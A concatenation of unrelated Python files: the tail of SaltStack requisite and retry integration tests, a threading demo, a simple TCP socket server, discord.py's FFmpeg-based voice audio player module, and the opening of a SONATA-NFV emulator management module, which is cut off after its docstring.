test to ensure state is run even if only one
of the onfails fails. This is a test for the issue:
https://github.com/saltstack/salt/issues/22370
'''
state_run = self.run_function('state.sls', mods='requisites.onfail_multiple')
retcode = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['retcode']
self.assertEqual(retcode, 0)
stdout = state_run['cmd_|-c_|-echo itworked_|-run']['changes']['stdout']
self.assertEqual(stdout, 'itworked')
def test_onfail_in_requisite(self):
'''
Tests a simple state using the onfail_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.onfail_in_simple')
# First, test the result of the state run when a failure is expected to happen
test_data = state_run['cmd_|-test_failing_state_|-echo "Success!"_|-run']['comment']
expected_result = 'Command "echo "Success!"" run'
self.assertIn(expected_result, test_data)
# Then, test the result of the state run when a failure is not expected to happen
test_data = state_run['cmd_|-test_non_failing_state_|-echo "Should not run"_|-run']['comment']
expected_result = 'State was not run because onfail req did not change'
self.assertIn(expected_result, test_data)
# listen tests
def test_listen_requisite(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite(self):
'''
Tests a simple state using the listen_in requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_simple')
# Test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listen_in_resolution_|-echo "Successful listen_in resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_resolution(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
        test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
open(testfile, 'a').close() # pylint: disable=resource-leakage
def test_retry_option_eventual_success(self):
'''
        test a state with the retry option that should return True after at least 4 retry attempts,
        but never reach 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
        Previously, the order option, when used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
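# The expected_result dicts above compare only a few keys and reduce 'changes' to a
# boolean. A minimal, standalone sketch of that normalization (self.normalize_ret is
# defined elsewhere in this test class and may differ; the helper name below is an
# assumption) could look like this:
def _normalize_ret_sketch(ret):
    '''
    Reduce a state.sls return dict to the keys the assertions above compare.
    '''
    out = {}
    for tag, data in ret.items():
        out[tag] = {
            '__run_num__': data['__run_num__'],
            'comment': data['comment'],
            'result': data['result'],
            # the tests only care whether anything changed at all
            'changes': bool(data['changes']),
        }
    return out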
|
08_4_threading_test.py
|
import threading
import time
print("hello world ----- 2021-04-06 starting")
def loop():
""" 新线程执行的代码"""
now_thread = threading.current_thread()
n = 0
while n < 5:
print('[loop]now thread name: {0}'.format(now_thread.name))
print(n)
time.sleep(2)
n += 1
def use_thread():
""" 使用线程来实现"""
# 当前正在执行的线程名称
now_thread = threading.current_thread()
print('now thread name: {0}'.format(now_thread.name))
t = threading.Thread(target=loop, name='loop_thread')
    # make the thread a daemon
# t.daemon = True
    # start the thread
t.start()
    # block (join) until the thread finishes
# t.join()
#print("hello world ----- 2021-04-06 ending")
if __name__ == "__main__":
use_thread()
print("hello world ----- 2021-04-06 ending")
|
server Non Blocking.py
|
import socket
import threading
from queue import Queue
sc = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
port = 2000
def clientThread(clnt, queue, inst):
clnt.send(bytes("Connection Established.",'utf-8'))
while True:
        if not inst.empty():  # .empty() is a method; only send "start" when an instruction is queued
clnt.send(bytes("start",'utf-8'))
while True:
message = clnt.recv(2048)
queue.put(message.decode('utf-8'))
if not message:
clnt.sendall(("Connection was closed due to no data.").encode('utf-8'))
break
clnt.close()
totalThreads = threading.active_count() -1
print(f"Total threads : {totalThreads}")
def printingThread(queue):
while True:
if(not queue.empty()):
print(queue.get())
try:
sc.bind((socket.gethostname(),port))
except Exception as e:
print(e)
sc.listen(100)
try:
    mainQ = Queue()
    instructionQueue = Queue()
    printer = threading.Thread(target=printingThread, args=(mainQ,))
printer.start()
while True:
print("Waiting for connections")
        client, addr = sc.accept()
        print(f"Connection has been made to {addr}!")
        t = threading.Thread(target=clientThread, args=(client, mainQ, instructionQueue,))
t.start()
totalThreads = threading.active_count()
print(f"Total threads : {totalThreads}\n")
except (KeyboardInterrupt, SystemExit):
    # no dedicated thread-cleanup helper exists; just close the listening socket
    sc.close()
sc.close()
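# Hedged sketch of a matching client (run it from a separate script/process, not in this
# file); the host/port mirror the bind() call above, and the message text is an assumption.
def exampleClient(host=None, port=2000):
    host = host or socket.gethostname()
    clientSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    clientSock.connect((host, port))
    # the server greets each client first ("Connection Established.")
    print(clientSock.recv(2048).decode('utf-8'))
    # anything sent here is put on mainQ and printed by printingThread
    clientSock.send(bytes("hello from exampleClient", 'utf-8'))
    clientSock.close()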
|
player.py
|
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
from __future__ import annotations
import threading
import traceback
import subprocess
import audioop
import asyncio
import logging
import shlex
import time
import json
import sys
import re
import io
from typing import Any, Callable, Generic, IO, Optional, TYPE_CHECKING, Tuple, Type, TypeVar, Union
from .errors import ClientException
from .opus import Encoder as OpusEncoder
from .oggparse import OggStream
from .utils import MISSING
if TYPE_CHECKING:
from .voice_client import VoiceClient
AT = TypeVar("AT", bound="AudioSource")
FT = TypeVar("FT", bound="FFmpegOpusAudio")
_log = logging.getLogger(__name__)
__all__ = (
"AudioSource",
"PCMAudio",
"FFmpegAudio",
"FFmpegPCMAudio",
"FFmpegOpusAudio",
"PCMVolumeTransformer",
)
CREATE_NO_WINDOW: int
if sys.platform != "win32":
CREATE_NO_WINDOW = 0
else:
CREATE_NO_WINDOW = 0x08000000
class AudioSource:
"""Represents an audio stream.
The audio stream can be Opus encoded or not, however if the audio stream
is not Opus encoded then the audio format must be 16-bit 48KHz stereo PCM.
.. warning::
The audio source reads are done in a separate thread.
"""
def read(self) -> bytes:
"""Reads 20ms worth of audio.
Subclasses must implement this.
        If the audio is complete, then return an empty
        :term:`py:bytes-like object` to signal this.
If :meth:`~AudioSource.is_opus` method returns ``True``, then it must return
20ms worth of Opus encoded audio. Otherwise, it must be 20ms
worth of 16-bit 48KHz stereo PCM, which is about 3,840 bytes
per frame (20ms worth of audio).
Returns
--------
:class:`bytes`
A bytes like object that represents the PCM or Opus data.
"""
raise NotImplementedError
def is_opus(self) -> bool:
"""Checks if the audio source is already encoded in Opus."""
return False
def cleanup(self) -> None:
"""Called when clean-up is needed to be done.
Useful for clearing buffer data or processes after
it is done playing audio.
"""
pass
def __del__(self) -> None:
self.cleanup()
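# A minimal illustrative subclass (an addition, not part of the library): per the read()
# contract documented above, a non-Opus source returns 20ms of 16-bit 48KHz stereo PCM
# per call, i.e. OpusEncoder.FRAME_SIZE bytes, and b"" once it is exhausted.
class _SilenceSource(AudioSource):
    """Hypothetical source that yields a fixed number of silent PCM frames."""
    def __init__(self, frames: int = 50) -> None:
        self._remaining = frames  # 50 frames * 20ms = one second of silence
    def read(self) -> bytes:
        if self._remaining <= 0:
            return b""  # signals the player that the source is exhausted
        self._remaining -= 1
        return b"\x00" * OpusEncoder.FRAME_SIZE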
class PCMAudio(AudioSource):
"""Represents raw 16-bit 48KHz stereo PCM audio source.
Attributes
-----------
stream: :term:`py:file object`
A file-like object that reads byte data representing raw PCM.
"""
def __init__(self, stream: io.BufferedIOBase) -> None:
self.stream: io.BufferedIOBase = stream
def read(self) -> bytes:
ret = self.stream.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
class FFmpegAudio(AudioSource):
"""Represents an FFmpeg (or AVConv) based AudioSource.
    User-created AudioSources that use FFmpeg differently from how :class:`FFmpegPCMAudio` and
    :class:`FFmpegOpusAudio` work should subclass this.
.. versionadded:: 1.3
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
args: Any,
**subprocess_kwargs: Any,
):
piping = subprocess_kwargs.get("stdin") == subprocess.PIPE
if piping and isinstance(source, str):
raise TypeError(
"parameter conflict: 'source' parameter cannot be a string when piping to stdin"
)
args = [executable, *args]
kwargs = {"stdout": subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
        self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f"popen-stdin-writer:{id(self):#x}"
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(
target=self._pipe_writer, args=(source,), daemon=True, name=n
)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(" ")[0] if isinstance(args, str) else args[0]
raise ClientException(executable + " was not found.") from None
except subprocess.SubprocessError as exc:
raise ClientException(f"Popen failed: {exc.__class__.__name__}: {exc}") from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info("Preparing to terminate ffmpeg process %s.", proc.pid)
try:
proc.kill()
except Exception:
_log.exception("Ignoring error attempting to kill ffmpeg process %s", proc.pid)
if proc.poll() is None:
_log.info("ffmpeg process %s has not terminated. Waiting to terminate...", proc.pid)
proc.communicate()
_log.info(
"ffmpeg process %s should have terminated with a return code of %s.",
proc.pid,
proc.returncode,
)
else:
_log.info(
"ffmpeg process %s successfully terminated with return code of %s.",
proc.pid,
proc.returncode,
)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug(
"Write error for %s, this is probably not a problem", self, exc_info=True
)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def check_streams(self) -> None:
if self._process is MISSING or self._stdout is MISSING or self._stdin is MISSING:
raise ValueError("FFmpegAudio cannot be read more than once")
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = "ffmpeg",
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
args.extend(("-f", "s16le", "-ar", "48000", "-ac", "2", "-loglevel", "warning"))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
# self.check_streams()
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b""
return ret
def is_opus(self) -> bool:
return False
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = "ffmpeg",
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {
"stdin": subprocess.PIPE if pipe else subprocess.DEVNULL,
"stderr": stderr,
}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append("-i")
args.append("-" if pipe else source)
codec = "copy" if codec in ("opus", "libopus") else "libopus"
args.extend(
(
"-map_metadata",
"-1",
"-f",
"opus",
"-c:a",
codec,
"-ar",
"48000",
"-ac",
"2",
"-b:a",
f"{bitrate}k",
"-loglevel",
"warning",
)
)
if isinstance(options, str):
args.extend(shlex.split(options))
args.append("pipe:1")
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await discord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get("executable")
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[
Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]
] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or "native"
executable = executable or "ffmpeg"
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, "_probe_codec_" + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError(
"Expected str or callable for parameter 'probe', "
f"not '{method.__class__.__name__}'"
)
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
exe = executable[:2] + "probe" if executable in ("ffmpeg", "avconv") else executable
args = [
exe,
"-v",
"quiet",
"-print_format",
"json",
"-show_streams",
"-select_streams",
"a:0",
source,
]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data["streams"][0]
codec = streamdata.get("codec_name")
bitrate = int(streamdata.get("bit_rate", 0))
bitrate = max(round(bitrate / 1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(
source, executable: str = "ffmpeg"
) -> Tuple[Optional[str], Optional[int]]:
args = [executable, "-hide_banner", "-i", source]
proc = subprocess.Popen(
args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT
)
out, _ = proc.communicate(timeout=20)
output = out.decode("utf8")
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b"")
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f"expected AudioSource not {original.__class__.__name__}.")
if original.is_opus():
raise ClientException("AudioSource must not be Opus encoded.")
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception("Calling the after function failed.")
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f"Exception in voice thread {self.name}"
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
manage.py
|
# Copyright (c) 2015 SONATA-NFV and Paderborn University
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Neither the name of the SONATA-NFV, Paderborn University
# nor the names of its contributors may be used to endorse or promote
# products derived from this software without specific prior written
# permission.
#
# This work has been performed in the framework of the SONATA project,
# funded by the European Commission under Grant number 671517 through
# the Horizon 2020 and 5G-PPP programmes. The authors would like to
# acknowledge the contributions of their colleagues of the SONATA
# partner consortium (www.sonata-nfv.eu).
import logging
import threading
import uuid
import networkx as nx
import chain_api
import json
import random
from emuvim.api.openstack.resources.net import Net
from emuvim.api.openstack.resources.port import Port
from mininet.node import OVSSwitch, RemoteController, Node
class OpenstackManage(object):
"""
OpenstackManage is a singleton and management component for the emulator.
It is the brain of the Openstack component and manages everything that is not datacenter specific like
